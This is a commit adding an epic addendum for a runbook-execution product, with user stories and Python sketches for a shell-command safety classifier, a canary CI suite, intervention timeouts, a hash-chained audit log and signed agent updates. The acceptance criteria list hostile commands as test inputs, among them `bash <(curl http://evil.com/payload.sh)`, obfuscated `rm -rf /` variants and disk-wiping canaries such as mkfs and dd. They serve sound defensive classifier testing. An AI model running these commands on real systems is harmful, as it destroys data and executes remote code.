Add BMad review epic addendums for all 6 products

Per-product surgical additions to existing epics (not cross-cutting):
- P1 route: 8pts (key redaction, SSE billing, token math, CI runner)
- P2 drift: 12pts (mTLS revocation, state lock recovery, pgmq visibility, RLS leak, entropy scrubber)
- P3 alert: 10pts (HMAC replay, claim-check, out-of-order correlation, free tier, tenant isolation)
- P4 portal: 9pts (partial scan recovery, ownership conflicts, Meilisearch rebuild, VCR freshness, free tier)
- P5 cost: 7pts (concurrent baselines, remediation RBAC, Clock interface, property tests, Redis fallback)
- P6 run: 15pts (shell AST parsing, canary suite, intervention TTL, streaming audit, crypto signatures)

Total: 61 story points across 30 new stories
2026-03-01 02:27:55 +00:00
parent cc003cbb1c
commit 72a0f26a7b
6 changed files with 449 additions and 0 deletions

@@ -0,0 +1,81 @@
# dd0c/run — Epic Addendum (BMad Review Findings)
**Source:** BMad Code Review (March 1, 2026)
**Approach:** Surgical additions to existing epics — no new epics created.
---
## Epic 1 Addendum: Runbook Parser
### Story 1.7: Shell AST Parsing (Not Regex)
As a safety-critical execution platform, I want command classification to use shell AST parsing (mvdan/sh), so that variable expansion attacks, eval injection, and hex-encoded payloads are caught.
**Acceptance Criteria:**
- `X=rm; Y=-rf; $X $Y /` classified as Dangerous (variable expansion resolved).
- `eval $(echo 'rm -rf /')` classified as Dangerous.
- `printf '\x72\x6d...' | bash` classified as Dangerous (hex decode).
- `bash <(curl http://evil.com/payload.sh)` classified as Dangerous (process substitution).
- `alias ls='rm -rf /'; ls` classified as Dangerous (alias redefinition).
- Heredoc whose body contains a dangerous command classified as Dangerous.
- `echo 'rm -rf / is dangerous'` classified as Safe (string literal, not command).
- `kubectl get pods -n production` classified as Safe.
**Estimate:** 5 points
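
To illustrate why this story rules out regex, the sketch below runs a deliberately naive pattern against three of the acceptance-criteria commands. The pattern and the `regex_classify` helper are hypothetical and are not the project's classifier; they only show the failure modes that AST parsing is meant to close.

```python
import re

# Hypothetical naive pattern: flags a literal "rm -rf" anywhere in the text.
NAIVE_PATTERN = re.compile(r"\brm\s+-rf\b")


def regex_classify(command: str) -> str:
    """Classify by substring match only (illustrative, intentionally flawed)."""
    return "Dangerous" if NAIVE_PATTERN.search(command) else "Safe"


# Commands taken from the acceptance criteria, with the classification they require.
CASES = [
    ("X=rm; Y=-rf; $X $Y /", "Dangerous"),
    ("echo 'rm -rf / is dangerous'", "Safe"),
    ("kubectl get pods -n production", "Safe"),
]


def regex_mismatches() -> list[str]:
    """Return the commands where the naive regex disagrees with the requirement."""
    return [cmd for cmd, expected in CASES if regex_classify(cmd) != expected]
```

Under these assumptions the regex misses the variable-expansion case and flags the quoted string literal, which are the two error directions (false negative and false positive) the criteria above target.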
---
## Epic 2 Addendum: Action Classifier
### Story 2.7: Canary Suite CI Gate (50 Known-Destructive Commands)
As a safety-first platform, I want a canary suite of 50 known-destructive commands that must ALL be classified as Dangerous, so that classifier regressions are caught before merge.
**Acceptance Criteria:**
- Suite contains exactly 50 commands (rm, mkfs, dd, fork bomb, chmod 777, kubectl delete, terraform destroy, DROP DATABASE, etc.).
- All 50 classified as Dangerous — any miss is a blocking CI failure.
- Suite count assertion prevents accidental removal of canary commands.
- Runs on every push and PR.
**Estimate:** 2 points
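
One possible shape for this gate is sketched below. The command list is shortened to five entries for readability (the story requires 50), and `naive_classify`, `check_canary_suite`, and `EXPECTED_COUNT` are hypothetical names, with `naive_classify` standing in for the real classifier.

```python
from typing import Callable, Sequence

# The story requires exactly 50; five are shown here for illustration only.
EXPECTED_COUNT = 5

CANARY_COMMANDS = [
    "rm -rf /",
    "mkfs.ext4 /dev/sda1",
    "dd if=/dev/zero of=/dev/sda",
    "kubectl delete namespace production",
    "terraform destroy -auto-approve",
]


def naive_classify(command: str) -> str:
    """Stand-in classifier (assumption); the real one would parse the shell AST."""
    prefixes = ("rm ", "mkfs", "dd ", "kubectl delete", "terraform destroy")
    return "Dangerous" if command.startswith(prefixes) else "Safe"


def check_canary_suite(
    classify: Callable[[str], str],
    commands: Sequence[str],
    expected_count: int,
) -> list[str]:
    """Return canaries NOT classified as Dangerous; raise if the suite size changed."""
    if len(commands) != expected_count:
        raise AssertionError(
            f"canary suite has {len(commands)} commands, expected {expected_count}"
        )
    return [cmd for cmd in commands if classify(cmd) != "Dangerous"]
```

In CI, a non-empty return value or a raised `AssertionError` would fail the job; keeping the count check separate from the classification check makes an accidental deletion visible as its own failure.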
---
## Epic 3 Addendum: Execution Engine
### Story 3.8: Intervention Deadlock TTL
As a reliable execution engine, I want manual intervention states to time out after a configurable TTL, so that a stuck execution doesn't hang forever waiting for a human who's asleep.
**Acceptance Criteria:**
- Manual intervention state transitions to FailedClosed after TTL (default 5 minutes).
- FailedClosed triggers out-of-band critical alert with execution context.
- Human resolution before TTL transitions to Complete (no FailedClosed).
**Estimate:** 2 points
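
The transitions above can be sketched as a small state machine. This is a minimal illustration, assuming the clock is passed in explicitly as `now` (seconds) and that an expiry exactly at the TTL counts as timed out; the class, the `AwaitingIntervention` state name, and the `alert` callback are hypothetical.

```python
from enum import Enum
from typing import Callable


class State(Enum):
    AWAITING_INTERVENTION = "AwaitingIntervention"  # hypothetical name
    COMPLETE = "Complete"
    FAILED_CLOSED = "FailedClosed"


class Intervention:
    """Manual-intervention wait that fails closed once the TTL elapses."""

    def __init__(
        self,
        started_at: float,
        ttl_seconds: float = 300.0,  # default of 5 minutes, per the criteria
        alert: Callable[[str], None] = lambda message: None,
    ) -> None:
        self.started_at = started_at
        self.ttl_seconds = ttl_seconds
        self.alert = alert
        self.state = State.AWAITING_INTERVENTION

    def tick(self, now: float) -> State:
        """Check the deadline; transition and alert once if it has passed."""
        waiting = self.state is State.AWAITING_INTERVENTION
        if waiting and now - self.started_at >= self.ttl_seconds:
            self.state = State.FAILED_CLOSED
            self.alert(f"intervention timed out after {self.ttl_seconds:.0f}s")
        return self.state

    def resolve(self, now: float) -> State:
        """Record a human resolution; it only counts if the TTL has not elapsed."""
        if self.tick(now) is State.AWAITING_INTERVENTION:
            self.state = State.COMPLETE
        return self.state
```

Passing `now` in rather than reading the system clock keeps the TTL behaviour deterministic in tests, and `FailedClosed` is terminal here, so a late resolution does not reopen the execution.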
---
## Epic 5 Addendum: Audit Trail
### Story 5.7: Streaming Append-Only Audit with Hash Chain
As a compliance-ready platform, I want audit events streamed immediately (not batched) with a cryptographic hash chain, so that tampering is detectable and events survive agent crashes.
**Acceptance Criteria:**
- Audit event available within 100ms of command execution (no batching).
- Hash chain: tampering with any event breaks the chain (detected by `verify_chain()`).
- WAL (write-ahead log): events survive agent crash and are recoverable.
**Estimate:** 3 points
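
A hash chain of this kind can be sketched in a few lines. The version below is an in-memory illustration only, assuming SHA-256 over the previous hash plus a canonical JSON payload; the event layout, `GENESIS` value, and `append_event` helper are hypothetical, and streaming and WAL persistence are out of scope.

```python
import hashlib
import json

GENESIS = "0" * 64  # assumed placeholder hash preceding the first event


def _digest(prev_hash: str, payload: dict) -> str:
    """Hash the previous link together with a canonical encoding of the payload."""
    body = json.dumps(payload, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + body).encode("utf-8")).hexdigest()


def append_event(chain: list, payload: dict) -> dict:
    """Append one audit event, linking it to the hash of the previous event."""
    prev_hash = chain[-1]["hash"] if chain else GENESIS
    event = {
        "payload": payload,
        "prev_hash": prev_hash,
        "hash": _digest(prev_hash, payload),
    }
    chain.append(event)
    return event


def verify_chain(chain: list) -> bool:
    """Recompute every link; any edited, reordered, or removed interior event fails."""
    prev_hash = GENESIS
    for event in chain:
        if event["prev_hash"] != prev_hash:
            return False
        if event["hash"] != _digest(prev_hash, event["payload"]):
            return False
        prev_hash = event["hash"]
    return True
```

Note that a chain like this cannot by itself detect removal of the most recent events; catching that would need the latest hash anchored somewhere outside the log, which this sketch does not attempt.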
### Story 5.8: Cryptographic Signatures for Agent Updates
As a zero-trust platform, I want agent binary and policy updates signed with the customer's Ed25519 key, so that a compromised SaaS cannot push malicious code to customer infrastructure.
**Acceptance Criteria:**
- Agent rejects binary update with invalid signature.
- Agent rejects policy update signed only by SaaS key (requires customer key).
- Agent accepts update with valid customer signature.
- Failed signature verification leaves the existing policy in force (the agent keeps running without degradation).
**Estimate:** 3 points
---
**Total Addendum:** 15 points across 5 stories